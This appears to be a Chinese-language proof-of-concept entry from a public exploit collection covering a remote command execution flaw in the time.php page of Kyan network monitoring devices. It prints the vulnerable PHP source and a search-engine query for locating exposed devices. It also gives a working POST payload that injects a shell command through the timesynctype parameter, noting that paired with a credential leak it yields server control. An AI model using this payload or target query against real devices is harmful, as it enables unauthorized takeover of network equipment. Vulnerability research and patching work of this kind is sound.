mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 20:06:03 +00:00
282 lines
6.9 KiB
Markdown
282 lines
6.9 KiB
Markdown
|
# Kyan 网络监控设备 time.php 远程命令执行漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
Kyan 网络监控设备 time.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
Kyan
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
app="Kyan设计"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
登录页面如下
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
存在漏洞的文件: `/time.php`
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
<?php
|
|||
|
|
require_once 'functions.php';
|
|||
|
|
require_once 'international.php';
|
|||
|
|
|
|||
|
|
session_start();
|
|||
|
|
auth_check();
|
|||
|
|
|
|||
|
|
//showHeader('Route', array('table.css'));
|
|||
|
|
if($_SERVER['REQUEST_METHOD'] == 'POST')
|
|||
|
|
{
|
|||
|
|
if(!user_is_admin())
|
|||
|
|
{
|
|||
|
|
showErrMessage("permission denied");
|
|||
|
|
exit;
|
|||
|
|
}
|
|||
|
|
$timesynctype = $_POST["timesynctype"];
|
|||
|
|
if($timesynctype!="client")
|
|||
|
|
{
|
|||
|
|
$output = shell_exec("/bin/bashsuid -p -c \"/usr/sbin/ntpdate " .$timesynctype. "\"");
|
|||
|
|
showMessage($output);
|
|||
|
|
shell_exec("/bin/bashsuid -p -c \"hwclock --systohc\"");
|
|||
|
|
}else
|
|||
|
|
{
|
|||
|
|
$ctime = $_POST["ctime"];
|
|||
|
|
shell_exec("/bin/bashsuid -p -c \"date " .$ctime. "\"");
|
|||
|
|
shell_exec("/bin/bashsuid -p -c \"hwclock --systohc\"");
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
echo "<html xmlns=\"http://www.w3.org/1999/xhtml\">\n";
|
|||
|
|
echo " <head>\n";
|
|||
|
|
echo " <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n";
|
|||
|
|
echo " <meta http-equiv=\"Content-Style-Type\" content=\"text/css\" />\n";
|
|||
|
|
echo " <meta http-equiv=\"Content-Script-Type\" content=\"text/javascript\" />\n";
|
|||
|
|
echo " <link type=\"text/css\" rel=\"stylesheet\" href=\"./templates/clean.css\" title=\"PSI_Template\"/>\n";
|
|||
|
|
echo " <title>time</title>\n";
|
|||
|
|
echo "<style type=\"text/css\">";
|
|||
|
|
echo "th, td, h3 {";
|
|||
|
|
echo "font-size: 12px;";
|
|||
|
|
echo "}";
|
|||
|
|
echo "</style>";
|
|||
|
|
echo " </head>\n";
|
|||
|
|
|
|||
|
|
//print_html_begin("time");
|
|||
|
|
?>
|
|||
|
|
<script language="javascript" type="text/javascript">
|
|||
|
|
//因程序执行耗费时间,所以时间并不十分准确,误差大约在2000毫秒以下
|
|||
|
|
var xmlHttp = false;
|
|||
|
|
//获取服务器时间
|
|||
|
|
try {
|
|||
|
|
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
|
|||
|
|
} catch (e) {
|
|||
|
|
try {
|
|||
|
|
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
|
|||
|
|
} catch (e2) {
|
|||
|
|
xmlHttp = false;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
if (!xmlHttp && typeof XMLHttpRequest != 'undefined') {
|
|||
|
|
xmlHttp = new XMLHttpRequest();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
xmlHttp.open("GET", "null.txt", false);
|
|||
|
|
xmlHttp.setRequestHeader("Range", "bytes=-1");
|
|||
|
|
xmlHttp.send(null);
|
|||
|
|
|
|||
|
|
severtime=new Date(xmlHttp.getResponseHeader("Date"));
|
|||
|
|
|
|||
|
|
//获取服务器日期
|
|||
|
|
var year=severtime.getFullYear();
|
|||
|
|
var month=severtime.getMonth()+1;
|
|||
|
|
var date=severtime.getDate();
|
|||
|
|
//获取服务器时间
|
|||
|
|
var hour=severtime.getHours();
|
|||
|
|
var minu=severtime.getMinutes();
|
|||
|
|
var seco=severtime.getSeconds();
|
|||
|
|
//获取客户端时间
|
|||
|
|
localtime=new Date();
|
|||
|
|
//取得时间差
|
|||
|
|
var jtime=Math.abs(localtime.getTime()-severtime.getTime());
|
|||
|
|
var jdate=jtime/(24*60*60*1000);
|
|||
|
|
var jhour=jtime%(24*60*60*1000)/(60*60*1000);
|
|||
|
|
var jminu=jtime%(24*60*60*1000)%(60*60*1000)/(60*1000);
|
|||
|
|
var jsecond=jtime%(24*60*60*1000)%(60*60*1000)%(60*1000)/1000;
|
|||
|
|
|
|||
|
|
//格式化输出客户端时间
|
|||
|
|
function getClientTime(){
|
|||
|
|
localtime=new Date();
|
|||
|
|
var cyear=localtime.getFullYear();
|
|||
|
|
var cmonth=localtime.getMonth()+1;
|
|||
|
|
var cdate=localtime.getDate();
|
|||
|
|
var chour=localtime.getHours();
|
|||
|
|
var cminu=localtime.getMinutes();
|
|||
|
|
var cseco=localtime.getSeconds();
|
|||
|
|
|
|||
|
|
ccyear=addZero(cyear);
|
|||
|
|
ccmonth=addZero(cmonth);
|
|||
|
|
ccdate=addZero(cdate);
|
|||
|
|
cchour=addZero(chour);
|
|||
|
|
ccminu=addZero(cminu);
|
|||
|
|
ccseco=addZero(cseco);
|
|||
|
|
|
|||
|
|
document.getElementById("clienttime").innerHTML=ccyear+"-"+ccmonth+"-"+ccdate+" "+cchour+":"+ccminu+":"+ccseco;
|
|||
|
|
document.getElementById("ctime").value= ccmonth+""+ccdate+""+cchour+""+ccminu+""+ccyear+"."+ccseco;
|
|||
|
|
}
|
|||
|
|
//格式化输出服务器时间
|
|||
|
|
function getSeverTime(){
|
|||
|
|
seco++;
|
|||
|
|
if(seco==60){
|
|||
|
|
minu+=1;
|
|||
|
|
seco=0;
|
|||
|
|
}
|
|||
|
|
if(minu==60){
|
|||
|
|
hour+=1;
|
|||
|
|
minu=0;
|
|||
|
|
}
|
|||
|
|
if(hour==24){
|
|||
|
|
date+=1;
|
|||
|
|
hour=0;
|
|||
|
|
}
|
|||
|
|
//日期处理
|
|||
|
|
if(month==1||month==3||month==5||month==7
|
|||
|
|
||month==8||month==10||month==12)
|
|||
|
|
{
|
|||
|
|
if(date==32)
|
|||
|
|
{
|
|||
|
|
date=1;
|
|||
|
|
month+=1;
|
|||
|
|
}
|
|||
|
|
}else if(month==4||month==6||month==9||month==11){
|
|||
|
|
if(date==31){
|
|||
|
|
date=1;
|
|||
|
|
month+=1;
|
|||
|
|
}
|
|||
|
|
}else if(month==2){
|
|||
|
|
if(year%4==0&&year%100!=0){//闰年处理
|
|||
|
|
if(date==29){
|
|||
|
|
date=1;
|
|||
|
|
month+=1;
|
|||
|
|
}
|
|||
|
|
}else{
|
|||
|
|
if(date==28){
|
|||
|
|
date=1;
|
|||
|
|
month+=1;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
if(month==13){
|
|||
|
|
year+=1;
|
|||
|
|
month=1;
|
|||
|
|
}
|
|||
|
|
sseco=addZero(seco);
|
|||
|
|
sminu=addZero(minu);
|
|||
|
|
shour=addZero(hour);
|
|||
|
|
sdate=addZero(date);
|
|||
|
|
smonth=addZero(month);
|
|||
|
|
syear=year;
|
|||
|
|
|
|||
|
|
document.getElementById("servertime").innerHTML=syear+"-"+smonth+"-"+sdate+" "+shour+":"+sminu+":"+sseco;
|
|||
|
|
setTimeout("getSeverTime()",1000);
|
|||
|
|
setTimeout("getClientTime()",100);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function addZero(num) {
|
|||
|
|
num=Math.floor(num);
|
|||
|
|
return ((num <= 9) ? ("0" + num) : num);
|
|||
|
|
}
|
|||
|
|
function updatetime()
|
|||
|
|
{
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
|
|||
|
|
<body onLoad="getSeverTime();">
|
|||
|
|
<table style='width:500px' border='0' align='center' cellpadding='3' cellspacing='1'>
|
|||
|
|
<th colspan="2"><?php echo lang_get('Timer'); ?></th>
|
|||
|
|
<tr ><td align='right' width=50%><?php echo lang_get('System time')?></td><td align='left'><div id="servertime"></div></td></tr>
|
|||
|
|
<tr ><td align='right'><?php echo lang_get('Client time')?></td><td align='left'><div id="clienttime"></div></td></tr>
|
|||
|
|
<tr ><td colspan="2" align="center">
|
|||
|
|
<form name="Form1" method="post" action=<?php echo $_SERVER['PHP_SELF']?>>
|
|||
|
|
<input type="hidden" name="cdate" id="cdate" value=""/>
|
|||
|
|
<input type="hidden" name="ctime" id="ctime" value=""/>
|
|||
|
|
<?php echo lang_get('Sync Source');?>:
|
|||
|
|
<select name="timesynctype" id="timesynctype" >
|
|||
|
|
<option value="time.windows.com" selected="selected">time.windows.com</option>
|
|||
|
|
<option value="time.nist.gov">time.nist.gov</option>
|
|||
|
|
<?php
|
|||
|
|
/*$system_lic_file = '/mnt/licenses/system/system.dat';
|
|||
|
|
$bsynctoclient=false;
|
|||
|
|
if(file_exists($system_lic_file))
|
|||
|
|
{
|
|||
|
|
$output = shell_exec("/bin/bashsuid -p -c \"openssl bf-cbc -K 000102030405060708090A0B0C0D0E0F -iv 0102030405060708 -d -in /mnt/licenses/system/system.dat |grep -v \"^;\"|grep Expire\"");
|
|||
|
|
if($output == "")
|
|||
|
|
{
|
|||
|
|
$bsynctoclient = true;
|
|||
|
|
}else
|
|||
|
|
{
|
|||
|
|
$bsynctoclient = false;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
if($bsynctoclient)
|
|||
|
|
{*/
|
|||
|
|
echo "<option value=\"client\" >".lang_get('PC Client')."</option>";
|
|||
|
|
/* } */
|
|||
|
|
|
|||
|
|
?>
|
|||
|
|
|
|||
|
|
</select>
|
|||
|
|
<input type="submit" name="update" id="update" value="<?php echo lang_get('Update Now');?>" />
|
|||
|
|
</form>
|
|||
|
|
</td></tr>
|
|||
|
|
</table>
|
|||
|
|
</body>
|
|||
|
|
</html>
|
|||
|
|
<?php
|
|||
|
|
//print_html_end();
|
|||
|
|
?>
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
其中需要注意的地方
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
if($_SERVER['REQUEST_METHOD'] == 'POST')
|
|||
|
|
{
|
|||
|
|
if(!user_is_admin())
|
|||
|
|
{
|
|||
|
|
showErrMessage("permission denied");
|
|||
|
|
exit;
|
|||
|
|
}
|
|||
|
|
$timesynctype = $_POST["timesynctype"];
|
|||
|
|
if($timesynctype!="client")
|
|||
|
|
{
|
|||
|
|
$output = shell_exec("/bin/bashsuid -p -c \"/usr/sbin/ntpdate " .$timesynctype. "\"");
|
|||
|
|
showMessage($output);
|
|||
|
|
shell_exec("/bin/bashsuid -p -c \"hwclock --systohc\"");
|
|||
|
|
}else
|
|||
|
|
{
|
|||
|
|
$ctime = $_POST["ctime"];
|
|||
|
|
shell_exec("/bin/bashsuid -p -c \"date " .$ctime. "\"");
|
|||
|
|
shell_exec("/bin/bashsuid -p -c \"hwclock --systohc\"");
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
参数均可控,构造POC
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
POST /time.php
|
|||
|
|
|
|||
|
|
timesynctype=;id>2.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|